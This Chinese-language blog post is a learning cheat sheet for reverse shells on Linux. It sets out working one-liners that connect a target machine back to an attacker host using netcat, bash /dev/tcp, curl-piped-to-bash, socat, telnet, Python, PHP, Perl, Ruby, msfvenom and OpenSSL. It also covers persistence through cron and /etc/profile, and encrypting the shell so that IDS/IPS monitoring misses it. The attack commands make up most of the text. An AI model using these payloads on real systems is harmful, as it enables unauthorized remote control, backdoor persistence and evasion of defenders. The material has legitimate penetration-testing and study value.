反弹shell学习
Drunkbaby Lv6
  2022-07-20 11:44:38 2022-07-20 11:44   2023-03-29 21:54:14      3.3k 字  13 分钟  

反弹shell学习

反弹 shell 学习

大部分内容摘自 https://xz.aliyun.com/t/9488

0x01 前言

反弹 shell,就是攻击机监听在某个 TCP/UDP 端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。

0x02 机器的两种连接方式

正向连接

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、Web 服务、ssh、telnet 等等都是正向连接。

反向连接

当正向连接无法接入的时候我们需要反向连接,都有这些情况。

  • 比如在渗透过程中,发现 22 端口是存在的,当时因为防火墙的存在,目标机器只能与加白的机器连接。
  • 目标机端口被占用。
  • 目标机位于局域网,或 IP 会动态变化,攻击机无法直接连接。
  • …. 还有一些其他的未知情况

那么反向连接就很好理解了,就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。

反弹 shell 的方式有很多,那具体要用哪种方式还需要根据目标主机的环境来确定,比如目标主机上如果安装有 netcat,那我们就可以利用 netcat 反弹 shell,如果具有 python 环境,那我们可以利用 python 反弹 shell。如果具有 php 环境,那我们可以利用 php 反弹 shell。

0x03 反弹 shell 姿势总结

  • 我这里的是两台 Linux 机器

1. 使用 netcat 反弹 shell

  • 一般 Linux 发行版当中都会自带 netcat,若功能不全可下载二进制的版本,进行编译即可。

攻击机开启本地监听:

1
netcat -lvvp 2333

目标机主动连接攻击机:

1
2
netcat 89.xxx.xxx.72 2333 -e /bin/bash
# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

有时候没有 bash,要用 sh

1
nc IP 2333 -e /bin/sh

弹 shell 效果如下

2. 利用 Bash 反弹 shell

反弹 shell 最好用的方法就是使用 bash 结合重定向方法的一句话,具体命令如下:

1
2
3
4
bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1

bash -c "bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1"
# bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1
  • bash -i : 产生一个 bash 交互环境。
  • >& : 将联合符号前面的内容与后面相结合,然后一起重定向给后者。
  • /dev/tcp/47.xxx.xxx.72/2333 : 让目标主机与攻击机 47.xxx.xxx.72 的 2333 端口建立一个 tcp 连接
  • 0>&1 : 将标准输入与标准输出的内容相结合然后重定向给前面标准输出的内容。

Bash 反弹一句完整的解读过程就是:

Bash 产生了一个交互环境和本地主机主动发起与攻击机 2333 端口建立的连接(即 TCP 2333 会话连接)相结合,然后在重定向个 TCP 2333 会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个 Bash 反弹环境。

实操

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1

成功!

Curl 配合 Bash 反弹 Shell

这里操作也很简单,借助了 Linux 中的管道。

首先,在攻击者 vps 的 web 目录里面创建一个 index 文件(index.php 或 index.html),内容如下:

1
bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1

并开启 2333 端口的监听。

然后再目标机上执行如下,即可反弹 shell:

1
curl 47.xxx.xxx.72|bash

这里我没试成功,用另外师傅成功的图片

Curl 配合 Bash 反弹 shell 的方式在 CTF 题目中经常出现,curl IP|bash 中的 IP 可以是任意格式的,可以是十进制、十六进制、八进制、二进制等等。

将反弹shell的命令写入定时任务

我们可以在目标主机的定时任务文件中写入一个反弹 shell 的脚本,但是前提是我们必须要知道目标主机当前的用户名是哪个。因为我们的反弹shell命令是要写在 /var/spool/cron/[crontabs]/<username> 内的,所以必须要知道远程主机当前的用户名。否则就不能生效。

比如,当前用户名为 root,我们就要将下面内容写入到 /var/spool/cron/root 中。(centos系列主机)

比如,当前用户名为 root,我们就要将下面内容写入到 /var/spool/cron/crontabs/root 中。(Debian/Ubuntu系列主机)

将反弹 shell 的命令写入 /etc/profile 文件

将以下反弹 shell 的命写入 /etc/profile 文件中,/etc/profile 中的内容会在用户打开 bash 窗口时执行。

1
2
/bin/bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1 &
# 最后面那个&为的是防止管理员无法输入命令

当目标主机管理员远程连接该主机时,就会执行该命令,成功获得目标机的 shell:

  • 个人觉得这里很像后门

3. 使用 socat 反弹 shell

Socat 是 Linux 下一个多功能的网络工具,名字来由是”Socket CAT”,因此可以看出它是基于socket的,其功能与netcat类似,不过据说可以看做netcat的加强版,事实上的确也是如此。我这里只简单的介绍下怎么使用它开启监听和反弹shell,其他详细内容可以参见这里:http://brieflyx.me/2015/linux-tools/socat-introduction/

弹 shell 的手法和 netcat 一样

攻击机开启本地监听:

1
2
3
socat TCP-LISTEN:2333 -

nc -lvvp 2333

目标机主动连接攻击机:

1
socat tcp-connect:47.xxx.xxx.72:2333 exec:'bash -li',pty,stderr,setsid,sigint,sane

4. 利用 Telnet 弹 shell

当 nc 和 /dev/tcp 不可用,且目标主机和攻击机上支持 Telnet 服务时,我们可以使用Telnet反弹shell。

方法一

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
mknod a p; telnet 47.xxx.xxx.72 2333 0<a | /bin/bash 1>a

方法二

攻击机需要开启两个本地监听:

1
2
nc -lvvp 2333
nc -lvvp 4000

目标机主动连接攻击机:

1
telnet 47.101.57.72 2333 | /bin/bash | telnet 47.101.57.72 4000

5. 各种脚本反弹 shell

Python 脚本弹 shell

当目标主机上有python环境时,我们可以用Python来反弹shell。Python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.xxx.xxx.72",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php 脚本弹 shell

当目标主机上有php环境时,我们可以用php来反弹shell。

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
php -r '$sock=fsockopen("47.xxx.xxx.72",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl 脚本反弹shell

当目标主机上有perl环境时,我们可以用perl来反弹shell。

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
perl -e 'use Socket;$i="47.101.57.72";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby脚本反弹shell

当目标主机上有ruby环境时,我们可以用ruby来反弹shell。

攻击机开启本地监听:

1
nc -lvvp 2333

目标机主动连接攻击机:

1
2
3
ruby -rsocket -e 'c=TCPSocket.new("47.xxx.xxx.72","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("47.xxx.xxx.72","2333");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

6. 使用Metasploit生成反弹shell用的一句话

强大的Metasploit框架也为我们提供了生成一句话反弹shell的工具,即msfvenom,绝对的实用。当我们不记得前面说的所有反弹shell的反弹语句时,只要我们有Metasploit,那么我们随时都可以使用 msfvenom -l 来查询生成我们所需要的各类命令行一句话,具体使用方法如下。

我们直接可以使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),列出我们需要生成的各类反弹shell一句话的payload:

1
msfvenom -l payloads | grep 'cmd/unix/reverse'

如上图所示,metasploit支持生成反弹shell一句话的类型非常丰富,大家可以依据渗透测试对象自行选择使用。比如,我们获取一个python反弹shell的一句话:

1
msfvenom -p cmd/unix/reverse_python LHOST=47.xxx.xxx.72 LPORT=2333 -f raw

将生成的python反弹shell的一句话在目标主机上执行即可:

0x04 反弹shell后获取模拟终端

其实,上面所讲的各种方法获取的shell都不是一个标准的虚拟终端环境,它仅仅是一个标准输入。你会发现存在一个问题,就是即使我们获取了目标虚拟终端控制权限,但是往往会发现其交互性非常的差,回显信息与可交互性非常的差和不稳定,具体见情况有以下几个种。

  • 获取的虚拟终端没有交互性,我们想给添加的账号设置密码或执行sudo等命令,无法完成。
  • 标准的错误输出无法显示,无法正常使用vim等文本编辑器等。
  • 获取的目标主机的虚拟终端使用非常不稳定,很容易断开连接。

这往往都是因为我们获取的shell并不是标准的虚拟终端,为了能够完成输入密码等操作,我们必须模拟一个真正的终端设备。

我们其实可以借助于python默认包含的一个pty标准库来获取一个标准的虚拟终端环境。Python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。

我们只需在获取的shell里面输入如下命令,即可模拟一个终端设备:

1
python -c "import pty;pty.spawn('/bin/bash')"

0x05 使用OpenSSL反弹加密shell

在上文中,我们总结了很多反弹shell得方法,但是我发现这种反弹 shell 方式都有一个缺点,那就是所有的流量都是明文传输的。这些通过shell通过传输的流量都可以被管理员直接抓取并理解,当目标主机网络环境存在网络防御检测系统时(IDS、IPS等),网络防御检测系统会获取到我们的通信内容并进行告警和阻止。因此,我们需要对通信的内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密的 shell。

OpenSSL 简介

在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。

SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。

在利用 OpenSSL 反弹 shell 之前需要先生成自签名证书:

1
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

反弹 shell 实操

实验环境:Linux

目标机:

  • 系统:Linux
  • IP:192.168.1.8

攻击机:

  • 系统:Linux
  • IP:47.xxx.xxx.72

假设我们从目标机反弹 shell 到攻击机 。首先需要利用上一步生成的自签名证书,在攻击机上使用 OpenSSL 监听一个端口,在这里使用 2333 端口:

1
openssl s_server -quiet -key key.pem -cert cert.pem -port 2333

此时 OpenSSL 便在攻击机的 2333 端口上启动了一个 SSL/TLS server。

这时在目标机进行反弹 shell 操作,命令为:

1
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.xxx.xxx.72:2333 > /tmp/s; rm /tmp/s

这样攻击者便使用 OpenSSL 反弹了目标机一个加密的 shell。

  • 本文标题反弹shell学习
  • 本文作者Drunkbaby
  • 创建时间2022-07-20 11:44:38
  • 本文链接2022/07/20/反弹shell学习/
  • 版权声明本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论
  1. 反弹 shell 学习
    1. 0x01 前言
    2. 0x02 机器的两种连接方式
      1. 正向连接
      2. 反向连接
    3. 0x03 反弹 shell 姿势总结
      1. 1. 使用 netcat 反弹 shell
      2. 2. 利用 Bash 反弹 shell
        1. Curl 配合 Bash 反弹 Shell
        2. 将反弹shell的命令写入定时任务
        3. 将反弹 shell 的命令写入 /etc/profile 文件
      3. 3. 使用 socat 反弹 shell
      4. 4. 利用 Telnet 弹 shell
        1. 方法一
        2. 方法二
      5. 5. 各种脚本反弹 shell
        1. Python 脚本弹 shell
        2. php 脚本弹 shell
        3. Perl 脚本反弹shell
        4. Ruby脚本反弹shell
      6. 6. 使用Metasploit生成反弹shell用的一句话
    4. 0x04 反弹shell后获取模拟终端
    5. 0x05 使用OpenSSL反弹加密shell
      1. OpenSSL 简介
      2. 反弹 shell 实操